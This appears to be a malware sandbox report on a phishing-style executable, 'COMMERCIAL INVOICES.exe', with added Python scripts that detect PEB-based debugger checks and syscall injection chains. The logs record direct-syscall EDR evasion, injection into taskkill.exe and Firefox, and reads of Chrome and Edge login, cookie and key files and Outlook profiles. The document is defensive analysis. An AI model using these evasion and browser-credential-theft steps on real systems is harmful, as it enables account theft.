Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01308B28 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01314B00 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_012BEB1D mov eax, dword ptr fs:[00000030h] (9 occurrences)
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_0123CB7E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_012F4B4B mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01312B57 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_012E8B42 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_012D6B40 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_0130AB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01238B50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_012EEB50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01250BBE mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_012F4BB0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01248BF0 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_0126EBFC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_012CCBF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01240BCD mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01260BCB mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_012EEBD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_0127CA24 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_0126EA2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01264A35 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_0127CA38 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_012CCA11 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_0127CA6F mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_012EEA60 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_012BCA72 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01246A50 mov eax, dword ptr fs:[00000030h] (7 occurrences)
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01250A5B mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01248AA0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01296AA4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_0124EA80 mov eax, dword ptr fs:[00000030h] (8 occurrences)
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Memory allocated: page read and write | page guard
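The `mov eax, dword ptr fs:[00000030h]` hits above are reads of the PEB pointer kept in the TEB (fs:[0x30] in a 32-bit process); the PEB holds `BeingDebugged` and the loader's module list, which is why the same sample also trips the report's debugger-check signature. The following Python is an added triage example, not code from the report or from the sample: it counts the report's hits per function id and scans a raw code blob for the same instruction encodings, then names the PEB field the next instruction touches. The byte patterns are the standard x86 encodings; the code blob is constructed for the example and is not taken from the sample.

```python
import re
from collections import Counter

# Constructed sample: a few "Code function" lines in the form the sandbox prints
# them (the function ids are the ones listed in this section of the report).
REPORT_LINES = [
    "Code function: 4_2_012529A0 mov eax, dword ptr fs:[00000030h]",
    "Code function: 4_2_012529A0 mov eax, dword ptr fs:[00000030h]",
    "Code function: 4_2_012C89B3 mov esi, dword ptr fs:[00000030h]",
    "Code function: 4_2_01262835 mov ecx, dword ptr fs:[00000030h]",
    "Code function: 4_2_0124EA80 mov eax, dword ptr fs:[00000030h]",
]

PEB_LINE = re.compile(
    r"Code function: (?P<func>\w+) mov (?P<reg>e[a-z]{2}), dword ptr fs:\[00000030h\]"
)


def peb_reads_per_function(lines):
    """Count fs:[0x30] (TEB.ProcessEnvironmentBlock) reads per function id."""
    counts = Counter()
    for line in lines:
        m = PEB_LINE.search(line)
        if m:
            counts[m.group("func")] += 1
    return dict(counts)


# x86 encodings of `mov <reg32>, dword ptr fs:[0x30]`: FS override 0x64, then
# either the short moffs32 form (A1) for eax or 8B /r with a disp32-only ModRM.
FS30_PATTERNS = {
    "eax": bytes.fromhex("64A130000000"),
    "ecx": bytes.fromhex("648B0D30000000"),
    "edx": bytes.fromhex("648B1530000000"),
    "ebx": bytes.fromhex("648B1D30000000"),
    "esi": bytes.fromhex("648B3530000000"),
    "edi": bytes.fromhex("648B3D30000000"),
}
# ModRM r/m value of each register, used to recognise the follow-up access.
REG_RM = {"eax": 0, "ecx": 1, "edx": 2, "ebx": 3, "esi": 6, "edi": 7}


def scan_for_peb_reads(blob):
    """Return sorted (offset, register) pairs for every fs:[0x30] read in blob."""
    hits = []
    for reg, pat in FS30_PATTERNS.items():
        start = 0
        while (i := blob.find(pat, start)) != -1:
            hits.append((i, reg))
            start = i + 1
    return sorted(hits)


def classify_peb_read(blob, offset, reg):
    """Name the PEB field the instruction after the PEB load touches.

    [reg+0x02] is PEB.BeingDebugged (IsDebuggerPresent done by hand),
    [reg+0x0C] is PEB.Ldr (start of a module-list walk); anything else is
    reported as a generic PEB access. Offsets follow the 32-bit PEB layout.
    """
    rm = REG_RM[reg]
    tail = blob[offset + len(FS30_PATTERNS[reg]):][:4]
    if len(tail) >= 3 and tail[0] == 0x8A and (tail[1] & 0xC7) == (0x40 | rm) and tail[2] == 0x02:
        return "PEB.BeingDebugged"          # mov r8, byte ptr [reg+2]
    if len(tail) >= 4 and tail[:2] == b"\x0f\xb6" and (tail[2] & 0xC7) == (0x40 | rm) and tail[3] == 0x02:
        return "PEB.BeingDebugged"          # movzx r32, byte ptr [reg+2]
    if len(tail) >= 3 and tail[0] == 0x8B and (tail[1] & 0xC7) == (0x40 | rm) and tail[2] == 0x0C:
        return "PEB.Ldr"                    # mov r32, dword ptr [reg+0xC]
    return "PEB (other field)"


def peb_read_report(blob):
    """(offset, register, classification) for every PEB read found in blob."""
    return [(off, reg, classify_peb_read(blob, off, reg)) for off, reg in scan_for_peb_reads(blob)]


# Constructed 32-bit code blob (not from the sample): a hand-rolled
# BeingDebugged check followed by a PEB.Ldr load.
SAMPLE_CODE = bytes.fromhex(
    "55"              # push ebp
    "8BEC"            # mov ebp, esp
    "64A130000000"    # mov eax, dword ptr fs:[0x30]   ; PEB
    "8A4002"          # mov al, byte ptr [eax+2]       ; PEB.BeingDebugged
    "84C0"            # test al, al
    "7502"            # jnz short +2
    "33C0"            # xor eax, eax
    "648B0D30000000"  # mov ecx, dword ptr fs:[0x30]   ; PEB again
    "8B410C"          # mov eax, dword ptr [ecx+0xC]   ; PEB.Ldr
    "5D"              # pop ebp
    "C3"              # ret
)

if __name__ == "__main__":
    print(peb_reads_per_function(REPORT_LINES))
    for off, reg, what in peb_read_report(SAMPLE_CODE):
        print(f"offset {off:#06x}: mov {reg}, fs:[0x30] -> {what}")
```

A PEB read by itself is not evidence of malice (compiler runtimes and unpackers read it too); what makes the report's hits interesting is the field that is read next, which is why the scanner classifies the following instruction instead of stopping at the fs:[0x30] pattern.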

            HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe | NtAllocateVirtualMemory: Direct from: 0x76EF48EC
Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe | NtQueryAttributesFile: Direct from: 0x76EF2E6C
Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe | NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe | NtQuerySystemInformation: Direct from: 0x76EF48CC
Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe | NtOpenSection: Direct from: 0x76EF2E0C
Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe | NtDeviceIoControlFile: Direct from: 0x76EF2AEC
Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe | NtQueryInformationToken: Direct from: 0x76EF2CAC
Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe | NtCreateFile: Direct from: 0x76EF2FEC
Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe | NtOpenFile: Direct from: 0x76EF2DCC
Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe | NtTerminateThread: Direct from: 0x76EF2FCC
Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe | NtOpenKeyEx: Direct from: 0x76EF2B9C
Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe | NtSetInformationProcess: Direct from: 0x76EF2C5C
Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe | NtProtectVirtualMemory: Direct from: 0x76EF2F9C
Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe | NtWriteVirtualMemory: Direct from: 0x76EF2E3C
Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe | NtNotifyChangeKey: Direct from: 0x76EF3C2C
Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe | NtCreateMutant: Direct from: 0x76EF35CC
Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe | NtResumeThread: Direct from: 0x76EF36AC
Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe | NtMapViewOfSection: Direct from: 0x76EF2D1C
Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe | NtQuerySystemInformation: Direct from: 0x76EF2DFC
Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe | NtReadFile: Direct from: 0x76EF2ADC
Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe | NtDelayExecution: Direct from: 0x76EF2DDC
Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe | NtQueryInformationProcess: Direct from: 0x76EF2C26
Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe | NtResumeThread: Direct from: 0x76EF2FBC
Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe | NtCreateUserProcess: Direct from: 0x76EF371C
Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe | NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe | NtWriteVirtualMemory: Direct from: 0x76EF490C
Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe | NtSetInformationThread: Direct from: 0x76EE63F9
Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe | NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe | NtSetInformationThread: Direct from: 0x76EF2B4C
Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe | NtReadVirtualMemory: Direct from: 0x76EF2E8C
Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe | NtCreateKey: Direct from: 0x76EF2C6C
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Memory written: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Section loaded: NULL target: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe protection: execute and read and write
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Section loaded: NULL target: C:\Windows\SysWOW64\taskkill.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: NULL target: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe protection: read write
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: NULL target: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\taskkill.exe | Thread register set: target process: 5900
Source: C:\Windows\SysWOW64\taskkill.exe | Thread APC queued: target process: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Process created: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe "C:\Users\user\Desktop\COMMERCIAL INVOICES.exe"
Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe | Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\SysWOW64\taskkill.exe"
Source: C:\Windows\SysWOW64\taskkill.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe | Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\SysWOW64\taskkill.exe"
Source: oKWoZthfkV.exe, 00000005.00000000.2455618039.0000000001861000.00000002.00000001.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000005.00000002.3898849675.0000000001861000.00000002.00000001.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899374836.0000000001321000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
Source: oKWoZthfkV.exe, 00000005.00000000.2455618039.0000000001861000.00000002.00000001.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000005.00000002.3898849675.0000000001861000.00000002.00000001.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899374836.0000000001321000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: oKWoZthfkV.exe, 00000005.00000000.2455618039.0000000001861000.00000002.00000001.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000005.00000002.3898849675.0000000001861000.00000002.00000001.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899374836.0000000001321000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: oKWoZthfkV.exe, 00000005.00000000.2455618039.0000000001861000.00000002.00000001.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000005.00000002.3898849675.0000000001861000.00000002.00000001.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899374836.0000000001321000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Queries volume information: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe VolumeInformation
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
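The "Direct from" entries above are the evidence behind the report's "Found direct / indirect Syscall (likely to bypass EDR)" signature: each records a native syscall together with the address it was issued from. Added example, not code from the report: a Python triage script that parses these lines (it also tolerates the raw report form, where the process path is fused to the syscall name and link text trails the address), summarises call sites per syscall, reports the address span the calls come from, and checks the listing for the ordered syscall sequences that make up common injection chains. The chain definitions and labels are my own; the sample lines are a subset of this section in the report's listing order, which is not guaranteed to be chronological, and the negative "process-hollowing" result shows why an order-sensitive rule must be fed a real timeline rather than a report listing.

```python
import re
from collections import defaultdict

# Constructed subset of the "Direct from" lines above, kept in the order the
# report lists them (not necessarily the order the calls happened).
SAMPLE_LINES = [
    "NtAllocateVirtualMemory: Direct from: 0x76EF48EC",
    "NtQueryAttributesFile: Direct from: 0x76EF2E6C",
    "NtQuerySystemInformation: Direct from: 0x76EF48CC",
    "NtOpenSection: Direct from: 0x76EF2E0C",
    "NtAllocateVirtualMemory: Direct from: 0x76EF2BEC",
    "NtCreateFile: Direct from: 0x76EF2FEC",
    "NtProtectVirtualMemory: Direct from: 0x76EF2F9C",
    "NtWriteVirtualMemory: Direct from: 0x76EF2E3C",
    "NtCreateMutant: Direct from: 0x76EF35CC",
    "NtResumeThread: Direct from: 0x76EF36AC",
    "NtMapViewOfSection: Direct from: 0x76EF2D1C",
    "NtResumeThread: Direct from: 0x76EF2FBC",
    "NtCreateUserProcess: Direct from: 0x76EF371C",
    "NtAllocateVirtualMemory: Direct from: 0x76EF3C9C",
    "NtWriteVirtualMemory: Direct from: 0x76EF490C",
    "NtSetInformationThread: Direct from: 0x76EE63F9",
    "NtReadVirtualMemory: Direct from: 0x76EF2E8C",
]

# The process path before the Nt name and any trailing link text are simply
# not captured, so the raw report lines parse as well as the cleaned ones.
DIRECT_RE = re.compile(r"(Nt[A-Z][A-Za-z]+): Direct from: (0x[0-9A-Fa-f]+)")


def parse_direct_syscalls(lines):
    """Return [(syscall_name, caller_address), ...] in input order."""
    out = []
    for line in lines:
        m = DIRECT_RE.search(line)
        if m:
            out.append((m.group(1), int(m.group(2), 16)))
    return out


def summarize(events):
    """Per syscall: number of calls and the distinct addresses they came from."""
    calls = defaultdict(int)
    sites = defaultdict(set)
    for name, addr in events:
        calls[name] += 1
        sites[name].add(addr)
    return {n: {"calls": calls[n], "sites": sorted(sites[n])} for n in calls}


def caller_span(events):
    """Lowest and highest caller address. A tight span is a hint that one code
    region (for example a private copy of the syscall stubs) issues them all;
    a real EDR check would compare the addresses with ntdll's mapped range."""
    addrs = [a for _, a in events]
    return (min(addrs), max(addrs))


# Injection chains as ordered steps; each step is a tuple of acceptable syscalls.
WRITE_RESUME = [("NtAllocateVirtualMemory",), ("NtWriteVirtualMemory",), ("NtResumeThread",)]
SECTION_MAP = [("NtOpenSection", "NtCreateSection"), ("NtMapViewOfSection",), ("NtResumeThread",)]
HOLLOWING = [("NtCreateUserProcess",), ("NtAllocateVirtualMemory",),
             ("NtWriteVirtualMemory",), ("NtResumeThread",)]


def find_chain(names, chain):
    """Leftmost in-order subsequence match; returns matched indices or None."""
    idx, pos = [], 0
    for step in chain:
        while pos < len(names) and names[pos] not in step:
            pos += 1
        if pos == len(names):
            return None
        idx.append(pos)
        pos += 1
    return idx


def detect_chains(events):
    names = [n for n, _ in events]
    return {label: find_chain(names, chain)
            for label, chain in [("write-and-resume", WRITE_RESUME),
                                 ("section-mapping", SECTION_MAP),
                                 ("process-hollowing", HOLLOWING)]}


if __name__ == "__main__":
    ev = parse_direct_syscalls(SAMPLE_LINES)
    lo, hi = caller_span(ev)
    print(f"{len(ev)} direct syscalls issued from {lo:#x}-{hi:#x}")
    for name, info in sorted(summarize(ev).items()):
        print(f"{name:28s} calls={info['calls']} sites={[hex(a) for a in info['sites']]}")
    print(detect_chains(ev))
```

The subsequence matcher allows gaps between steps, so an unrelated NtCreateFile or NtCreateMutant between allocation and write does not break a match; tightening it to a maximum gap is the usual next step when the input is a real event timeline.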

            Stealing of Sensitive Information

Source: Yara match | File source: 4.2.COMMERCIAL INVOICES.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.COMMERCIAL INVOICES.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.3899277856.00000000048F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2604198656.0000000005EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3898777340.0000000000CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2543824282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3899336059.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2545033489.0000000003F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3899241480.00000000056D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\taskkill.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\taskkill.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\taskkill.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\taskkill.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\taskkill.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\taskkill.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\taskkill.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\taskkill.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\taskkill.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
